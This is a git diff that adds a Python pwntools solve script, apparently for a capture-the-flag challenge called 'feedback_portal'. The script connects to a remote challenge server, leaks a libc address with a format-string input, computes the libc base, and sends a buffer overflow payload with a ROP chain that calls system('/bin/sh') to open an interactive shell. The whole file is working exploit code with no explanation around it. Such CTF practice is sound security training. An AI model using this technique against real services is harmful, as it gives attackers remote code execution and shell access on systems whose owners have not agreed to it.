Second CTFs part

ret2libc/03_feedback_portarl/solve.py

@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+context.binary = elf = ELF('./feedback_portal', checksec=False)
+# Change if on server
+
+libc = ELF('libc.so.6', checksec=False)
+#libc = ELF('/usr/lib/libc.so.6', checksec=False)
+OFFSET_TO_RIP = 128 + 8
+RET = 0x40101a
+#libc_call = libc.sym['__libc_start_main']
+libc_call = 0x29d90
+# local libc
+#POP_RDI = 0x10269a
+# remote libc
+POP_RDI = 0x10f78b
+BINSH = next(libc.search(b'/bin/sh\x00'))
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13595)
+
+p.recvuntil(b'Please enter your name:\n')
+# __libc_start_main (non funziona in remoto)
+#p.sendline(b"%47$lx")
+# __libc_start_call_main
+p.sendline(b"%25$lx")
+
+libc_start_main = p.recvline().split(b',')[1].strip()
+libc_start_main = b'0x' + libc_start_main
+libc_start_main = int(libc_start_main, 16)
+
+#libc_address = libc_start_main - libc_call - 128 - 8
+print(f"Libc start main dropped:{hex(libc_start_main)}")
+print(f"Libc start main from symbol:{hex(libc_call)}")
+print(f"BINSH:{hex(BINSH)}")
+libc_address = (libc_start_main - libc_call) & ~0xfff
+print(f"Addr: {hex(libc_address)}")
+libc.address = libc_address
+print(p.recvuntil(b'Now leave your feedback:\n'))
+payload = flat(
+        b'A' * OFFSET_TO_RIP,
+        p64(RET),
+        #elf.symbols["main"],
+        p64(libc_address + POP_RDI),
+        p64(libc_address + BINSH),
+        libc.symbols["system"]
+        )
+p.send(payload)
+#print(p.recvline())
+p.interactive()